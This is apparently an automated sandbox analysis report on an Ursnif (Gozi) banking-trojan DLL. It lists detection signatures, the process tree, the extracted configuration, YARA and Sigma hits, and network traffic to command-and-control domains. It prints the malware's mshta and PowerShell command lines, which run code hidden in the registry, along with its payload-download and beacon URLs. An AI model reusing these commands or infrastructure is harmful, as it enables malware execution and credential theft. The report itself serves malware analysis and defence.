Play interactive tour

Edit tour

Analysis Report SecuriteInfo.com.Generic.mg.f76b81b0397ae313.25278

Overview

General Information

Sample Name:	SecuriteInfo.com.Generic.mg.f76b81b0397ae313.25278 (renamed file extension from 25278 to dll)
Analysis ID:	353281
MD5:	f76b81b0397ae313b8f6d19d95c49edf
SHA1:	8f15106b524cc5db564845508a04ee3bf2709949
SHA256:	3e8b92cda2c0d1dc74de0b060f43c2baf23ab08af69667ddbbe66f78d5e0389a
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Dot net compiler compiles file from suspicious location

Yara detected Ursnif

Allocates memory in foreign processes

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Disables SPDY (HTTP compression, likely to perform web injects)

Hooks registry keys query functions (used to hide registry keys)

Injects code into the Windows Explorer (explorer.exe)

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Sigma detected: MSHTA Spawning Windows Shell

Suspicious powershell command line found

Tries to steal Mail credentials (via file access)

Writes or reads registry keys via WMI

Writes registry values via WMI

Writes to foreign memory regions

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Registers a DLL

Searches for the Microsoft Outlook file path

Sigma detected: Suspicious Rundll32 Activity

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w10x64

loaddll32.exe (PID: 5576 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll' MD5: 8081BC925DFC69D40463079233C90FA5)

regsvr32.exe (PID: 5876 cmdline: regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

control.exe (PID: 5528 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

rundll32.exe (PID: 6488 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)

cmd.exe (PID: 1440 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

iexplore.exe (PID: 1380 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6192 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6552 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82962 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6864 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6940 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82978 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

mshta.exe (PID: 492 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 5424 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 4136 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 5732 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3AD7.tmp' 'c:\Users\user\AppData\Local\Temp\gayi4abp\CSC8A545143BD644266B89F65F281FEEFE4.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 6124 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 2920 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4CF7.tmp' 'c:\Users\user\AppData\Local\Temp\wi0gyoxl\CSCA00873215094E3995281D323D18ADB7.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

RuntimeBroker.exe (PID: 3656 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

RuntimeBroker.exe (PID: 4268 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

RuntimeBroker.exe (PID: 4772 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

cmd.exe (PID: 6908 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\9090.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "353", "system": "2f28121f12f6b0f75396fd38214a7a6chh0N", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613433491", "user": "902d52678695dc15e71ab15c1d8e8ed0", "hash": "0xf857f57e", "soft": "3"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.756986766.0000000005F28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.757116216.0000000005F28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.756877993.0000000005F28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.757051571.0000000005F28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000016.00000003.789528617.000001F2CB9EF000.00000004.00000001.sdmp	SUSP_LNK_SuspiciousCommands	Detects LNK file with suspicious content	Florian Roth	0x34:$s12: WScript.Shell 0x201a:$s12: WScript.Shell
00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000002.00000003.756945473.0000000005F28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000002.00000003.825598679.0000000003470000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000002.00000002.845341823.0000000003430000.00000040.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.756743295.0000000005F28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
Process Memory Space: powershell.exe PID: 5424	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: explorer.exe PID: 3424	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: regsvr32.exe PID: 5876	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 30 entries

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5424, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline', ProcessId: 4136

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 492, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5424

Sigma detected: Suspicious Rundll32 Activity

Show sources

Source: Process started

Author: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 5528, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 6488

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://c56.lepini.at/jvassets/xI/t64.dat

Avira URL Cloud: Label: phishing

Found malware configuration

Show sources

Source: regsvr32.exe.5876.2.memstr

Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "353", "system": "2f28121f12f6b0f75396fd38214a7a6chh0N", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613433491", "user": "902d52678695dc15e71ab15c1d8e8ed0", "hash": "0xf857f57e", "soft": "3"}

Multi AV Scanner detection for domain / URL

Show sources

Source: c56.lepini.at	Virustotal: Detection: 8%	Perma Link
Source: api3.lepini.at	Virustotal: Detection: 10%	Perma Link
Source: api10.laptok.at	Virustotal: Detection: 10%	Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll	Virustotal: Detection: 16%			Perma Link
Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll	ReversingLabs: Detection: 10%

Compliance:

Uses 32bit PE files

Show sources

Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49762 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.810092544.0000017964DD0000.00000002.00000001.sdmp, csc.exe, 0000001C.00000002.818415180.0000022D72ED0000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000020.00000000.838540739.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.832600634.0000000006750000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: explorer.exe, 00000020.00000003.877702647.0000000006AD0000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.832600634.0000000006750000.00000004.00000001.sdmp
Source:	Binary string: \wl.pdb9 source: powershell.exe, 00000017.00000003.858136800.000001F6E100F000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: explorer.exe, 00000020.00000003.877702647.0000000006AD0000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000020.00000000.838540739.0000000005A00000.00000002.00000001.sdmp

Spreading:

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_033F3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB7500 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,RtlDeleteBoundaryDescriptor,
Source: C:\Windows\explorer.exe	Code function: 32_2_04DBAACC CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,

Networking:

Source: global traffic

HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

Source: Joe Sandbox View	IP Address: 104.20.184.68 104.20.184.68
Source: Joe Sandbox View	IP Address: 151.101.1.44 151.101.1.44

Source: Joe Sandbox View

ASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: global traffic	HTTP traffic detected: GET /api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJkO/Am1fQoOyYzGbM/xK7yrntx/Hruw1HZvAcfYl7dS_2F5g51/rLGjgSsh9h/OW8nevv3Dh4VYPuXW/03beET_2FA3a/YKD8HGeNgat/jK8A9eho17ABaL/cUew4H72hIfxngPdnFseX/f9MvJYHFQTCCYMoN/XdpbU1hBHNX722p/DPf7k1CgkBZqmPOtaO/MB_2B0Lh_/2FdHYj_2Bx0ZSPs6m_2F/GelX35xSpPMKNfn0Q3D/54O_2FBBcuPBTrZpvB9zhY/7AC9yYriaqcnPDRgK/E HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/ACRDYIo3vDDkE8nBO7rZ_2F/RKqyjTnG2z/bw24fKr8FPY8iC_2F/NOd8pP1qrd_2/B0zRVNFer70/12v4aw2Bat1oWp/EdxqaQHccPmd48WBI_2Fh/ZsZf5oFs1F5WVpMV/Aql6isAZLQXMGYV/uCpbF51_2FaHU68PIY/HN1L8Jeq6/71Of32mfKV_2FEsbc40d/blSVHi4z_2F2u7ZVT2S/LNeMbeXi5H54yUd71Yke04/YvCLg_2BV_2FO/HHmC2v0g/tP9YiJq20QZR4sjpPzGs48R/leCqM3qCaD/cvMCdxcgqejP1dFql/2a73eaCZuJLy/90fQzPpEVBC/OzDkRB7t1Aba9y/CFI HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FNzdBvmlH/vt_2B9x1x6ck65MR/ZpG7Z5d4NVWsbef/IA3fJ5Djq3zGkBqE7x/LReOBCAcB/qC_2F1dmcLdFTOEEnZgz/STGZ2dxkKMV5RKreGCr/RFkW6kLd_2Bklvq9QHSZcn/We3rTC8YPIxkv/L14t5cJM/ZLd1Hb81ZBMybrjlIjy_2Fg/_2F_2FS_2F/TBW_2Bf883H2QksUF/tthcWoumhUqM/8KeCGS7jeEC/1wCg0gHPiLWtYc/_2Fsv97M6I2fbFhoAJh9s/q_2FhY0fUvPWozDY/zNJTP3X_2B7F8/ha HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/_2F5TIxM/R_2B3lAdX7FSifvLwGRNf4T/Xn6jTZLuMx/wh5E4h_2FPyrBTqQP/YDN8egogNxbu/ymacPdIkir0/NKKNzqD2vuGYxD/EQ2iBv1vi_2FKgbC6jRvO/67ImFcDLm_2FOZDz/QiB35x1OBx9fyp0/LL2dXEqoTiSnjkl_2B/cqWZBDCtg/kw_2BqWxxyjtsXEtMuCO/OQivEAtVKK4aYWaKL3G/xgxPJ7qQNKlWaEOMoFWGiX/qJDWe3oU_2FIN/ksLvpLmR/pIAQEZhwMl9o8sI2Dx0z5d9/PBFpDZPttD/KT6P6hofH96qtO4zq/sMAC80l_2B/o HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/CVY_2B2WcFg2WjFu/gTASghvlaHDPZO5/OnfU03dRZmchUYorkJ/dtBA9sUmC/RowLHURoIpKv4i_2BgTY/G_2FIDqlTidiAlM0ssd/yjlpSbFr2QpoSO_2FENF6f/dTadM34HuUeK4/m4bwoeqS/4fYaIXnfqcsUEE_2FB4NB_2/FC2CDtfTvl/j09rSh75dvBI36PLe/jkDP0mf1Pjoo/MVDfZBDaObB/6QQIVykudU_2Fa/gB7utb_2BlN2NWtlVRg_2/BGfyNFafrreq_2B2/aeR3kQJGNtvuKDQ/P4hWZXg9_2BWc1HVsP/HL5s0z5R3/Zml2TISAgHQ/gJzI HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: unknown

HTTP traffic detected: POST /api1/Khaq04rDnev_2/FB_2BFzU/KI8bdPSAY3R_2FidTJv71m3/dvU3r7d2eL/scd3pdNtCTeJ_2Frq/OWGS0ExfsOsM/_2BPwAW1LdR/SHcm3WZGYcVW6D/WtMm_2BnA73XtQqx5ww7P/YAGrQTEZeVeHRogx/_2B99ZfB_2FmilX/7ChN3r52DnFdh04GaB/pT5_2FX83/Scw9iSPgYS8zehsLEcf9/v_2BuI3_2FeSXD8dbjK/TGxhWKgJt8_2B4wSzTBFun/2pwogTmb20mC4/H981V6qe/2_2BDwr9k_2Bpe4F_2BBGiU/1EiWwRg_2F/w_2FIQs5ggG07bgU_/2BwAzRket4TL/oTov HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Content-Length: 2Host: api3.lepini.at

Source: global traffic

